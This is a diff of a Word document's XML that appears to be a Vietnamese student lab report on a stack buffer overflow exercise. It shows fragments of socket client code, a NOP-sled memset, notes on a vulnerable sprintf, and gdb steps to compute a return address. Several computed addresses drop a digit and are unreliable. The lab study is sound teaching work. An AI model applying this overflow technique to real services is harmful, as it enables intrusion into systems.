+        <w:t>Protocolfamily ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> then converting the hostname or IP address, and getting  port number</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4949,8 +5367,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> = AF_INET;</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> = AF_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>INET;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5032,7 +5462,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> in_addr *)</w:t>
+        <w:t xml:space="preserve"> in_addr </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>*)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5044,6 +5485,7 @@
         </w:rPr>
         <w:t>host</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -5177,6 +5619,7 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -5197,6 +5640,7 @@
         </w:rPr>
         <w:t>[</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -5293,6 +5737,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -5311,7 +5756,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>(s, (</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>s, (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5437,8 +5893,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>(s);</w:t>
-      </w:r>
+        <w:t>(s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5462,6 +5930,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -5480,7 +5949,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(stderr, </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stderr, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5563,7 +6043,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5585,6 +6076,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5664,6 +6156,7 @@
         </w:rPr>
         <w:t xml:space="preserve">  size = </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -5682,7 +6175,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(s, buffer, </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">s, buffer, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5851,8 +6355,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>(s);</w:t>
-      </w:r>
+        <w:t>(s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5876,6 +6392,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -5894,7 +6411,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">(stderr, </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stderr, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5977,7 +6505,18 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5999,6 +6538,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6097,8 +6637,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>(s);</w:t>
-      </w:r>
+        <w:t>(s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6149,6 +6701,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471693E1" wp14:editId="4833F774">
             <wp:extent cx="5753903" cy="790685"/>
@@ -6193,6 +6748,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6EDF0C" wp14:editId="5B6FCD63">
             <wp:extent cx="4658375" cy="1047896"/>
@@ -6237,6 +6795,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B5E6ED8" wp14:editId="278FBB88">
             <wp:extent cx="6115050" cy="3703320"/>
@@ -6279,8 +6840,13 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Tiếp theo ta sẽ xem xem là payload sẽ được truyền vào đâu trong chương trình, đầu tiên ta sẽ thực hiện debug chương trình và chạy disassemble handling</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Tiếp theo ta sẽ xem xem là payload sẽ được truyền vào đâu trong chương trình, đầu tiên ta sẽ thực hiện debug chương trình và chạy disassemble </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>handling</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -6326,7 +6892,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Tiếp theo hàm ta cần chú ý đên là hàm sprintf ở breakpoint +221  do trong code lỗ hỏng đây là nơi tạo ra sự kiện address+7 làm thay đổi địa chỉ trả về nên ta cần phải chú ý thực hiện. </w:t>
+        <w:t>Tiếp theo hàm ta cần chú ý đên là hàm sprintf ở breakpoint +</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>221  do</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> trong code lỗ hỏng đây là nơi tạo ra sự kiện address+7 làm thay đổi địa chỉ trả về nên ta cần phải chú ý thực hiện. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6436,6 +7010,14 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t>Cách 1: ta sẽ kiểm tr</w:t>
+      </w:r>
+      <w:r>
+        <w:t>a từng thanh ghi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t>Thực hiện kiểm tra trên các thanh ghi thì ta thấy có đoạn payload giống với chương trình của ta ở thanh ghi ecx</w:t>
       </w:r>
     </w:p>
@@ -6491,8 +7073,13 @@
       <w:pPr>
         <w:ind w:firstLine="720"/>
       </w:pPr>
-      <w:r>
-        <w:t>memset(buffer, 0x90, BUF_SIZE);</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>memset(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>buffer, 0x90, BUF_SIZE);</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6602,6 +7189,343 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Cách 2: Thực hiện tính toán để kiểm tra chính xác thanh ghi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ở đây ta thấy được rằng là tại máy vm2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01A0E03E" wp14:editId="13C74FD7">
+            <wp:extent cx="4658375" cy="1047896"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="33" name="Picture 33" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="28" name="Picture 28" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4658375" cy="1047896"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Địa chỉ đang được được thông báo là 0xbfff</w:t>
+      </w:r>
+      <w:r>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>284</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, và ta thực thi truyền lệnh này</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>memset(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>buffer, 0x90, BUF_SIZE);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">thì cộng thêm </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>760 byte</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> của giá trị \x90, chuyển 760 sang hex sẽ là 2f8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ngoài ra ta cần cộng thêm 7 vì ở cụm “</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Hello :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>” là 7 ký tự</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Như vậy giá trị thanh ghi ta cần tìm là </w:t>
+      </w:r>
+      <w:r>
+        <w:t>0xbfff</w:t>
+      </w:r>
+      <w:r>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>284</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> + 2f8 + 7 = 0xbfff583</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, nhưng khi thực hiện debug ta thấy được là địa chỉ của ta đã nhảy về 0xbffff244 nên ta sẽ thực hiện lại phép tính là </w:t>
+      </w:r>
+      <w:r>
+        <w:t>0xbffff2</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4 + 2f8 + 7 = 0xbfff5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Đầu tiên ta thực hiện debug lại chương trình</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03C674B9" wp14:editId="7AA7E4B7">
+            <wp:extent cx="6115050" cy="6148705"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="39" name="Picture 39" descr="A picture containing text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="3" name="Picture 3" descr="A picture containing text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6115050" cy="6148705"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tiếp theo ta thực đặt breakpoint ở handling+226 và thực hiện (Minh chứng đổi địa chỉ khi thực hiện debug)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A64916" wp14:editId="544E9480">
+            <wp:extent cx="5620534" cy="1552792"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="34" name="Picture 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5620534" cy="1552792"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tiếp theo ta sẽ kiểm tra thanh ghi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78886E7A" wp14:editId="28CD63EF">
+            <wp:extent cx="6115050" cy="3950335"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="36" name="Picture 36" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="36" name="Picture 36" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6115050" cy="3950335"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Cuối cùng ta thực hiện kiểm tra tại thanh ghi </w:t>
+      </w:r>
+      <w:r>
+        <w:t>0xbfff543</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C1BA86A" wp14:editId="29ED97AE">
+            <wp:extent cx="6115050" cy="934085"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="37" name="Picture 37"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6115050" cy="934085"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
@@ -6753,6 +7677,7 @@
           <w:numId w:val="9"/>
         </w:numPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t xml:space="preserve">File </w:t>
       </w:r>
@@ -6760,7 +7685,14 @@
         <w:rPr>
           <w:color w:val="FF0000"/>
         </w:rPr>
-        <w:t xml:space="preserve"> .PDF</w:t>
+        <w:t xml:space="preserve"> .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>PDF</w:t>
       </w:r>
       <w:r>
         <w:t>. Tập trung vào nội dung, không mô tả lý thuyết.</w:t>
@@ -6853,7 +7785,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Đặt tên theo định dạng: [Mã lớp]-SessionX_GroupY. (trong đó X là Thứ tự buổi Thực hành, Y là số thứ tự Nhóm Thực hành</w:t>
+        <w:t>Đặt tên theo định dạng: [Mã lớp]-SessionX_GroupY. (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>trong</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> đó X là Thứ tự buổi Thực hành, Y là số thứ tự Nhóm Thực hành</w:t>
       </w:r>
       <w:r>
         <w:t>/Tên Cá nhân</w:t>
@@ -6883,8 +7823,13 @@
         <w:t>[</w:t>
       </w:r>
       <w:r>
-        <w:t>NT101.K11.ANTT</w:t>
-      </w:r>
+        <w:t>NT101.K</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>11.ANTT</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -7064,9 +8009,9 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId20"/>
-      <w:footerReference w:type="default" r:id="rId21"/>
-      <w:headerReference w:type="first" r:id="rId22"/>
+      <w:headerReference w:type="default" r:id="rId23"/>
+      <w:footerReference w:type="default" r:id="rId24"/>
+      <w:headerReference w:type="first" r:id="rId25"/>
       <w:pgSz w:w="11907" w:h="16839" w:code="9"/>
       <w:pgMar w:top="1440" w:right="837" w:bottom="1620" w:left="1440" w:header="540" w:footer="135" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -7554,7 +8499,15 @@
                               <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                               <w:sz w:val="20"/>
                             </w:rPr>
-                            <w:t xml:space="preserve">Báo cáo </w:t>
+                            <w:t xml:space="preserve">Báo </w:t>
+                          </w:r>
+                          <w:proofErr w:type="gramStart"/>
+                          <w:r>
+                            <w:rPr>
+                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
+                              <w:sz w:val="20"/>
+                            </w:rPr>
+                            <w:t xml:space="preserve">cáo </w:t>
                           </w:r>
                           <w:r>
                             <w:rPr>
@@ -7569,7 +8522,15 @@
                               <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                               <w:sz w:val="20"/>
                             </w:rPr>
-                            <w:t>Cơ chế hoạt động của mã độc</w:t>
+                            <w:t>Cơ</w:t>
+                          </w:r>
+                          <w:proofErr w:type="gramEnd"/>
+                          <w:r>
+                            <w:rPr>
+                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
+                              <w:sz w:val="20"/>
+                            </w:rPr>
+                            <w:t xml:space="preserve"> chế hoạt động của mã độc</w:t>
                           </w:r>
                         </w:p>
                         <w:p>
@@ -7688,7 +8649,15 @@
                         <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                         <w:sz w:val="20"/>
                       </w:rPr>
-                      <w:t xml:space="preserve">Báo cáo </w:t>
+                      <w:t xml:space="preserve">Báo </w:t>
+                    </w:r>
+                    <w:proofErr w:type="gramStart"/>
+                    <w:r>
+                      <w:rPr>
+                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
+                        <w:sz w:val="20"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve">cáo </w:t>
                     </w:r>
                     <w:r>
                       <w:rPr>
@@ -7703,7 +8672,15 @@
                         <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                         <w:sz w:val="20"/>
                       </w:rPr>
-                      <w:t>Cơ chế hoạt động của mã độc</w:t>
+                      <w:t>Cơ</w:t>
+                    </w:r>
+                    <w:proofErr w:type="gramEnd"/>
+                    <w:r>
+                      <w:rPr>
+                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
+                        <w:sz w:val="20"/>
+                      </w:rPr>
+                      <w:t xml:space="preserve"> chế hoạt động của mã độc</w:t>
                     </w:r>
                   </w:p>
                   <w:p>
@@ -12708,7 +13685,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00D26A66"/>
+    <w:rsid w:val="00BC3F8C"/>
     <w:pPr>
       <w:spacing w:after="120"/>
     </w:pPr>
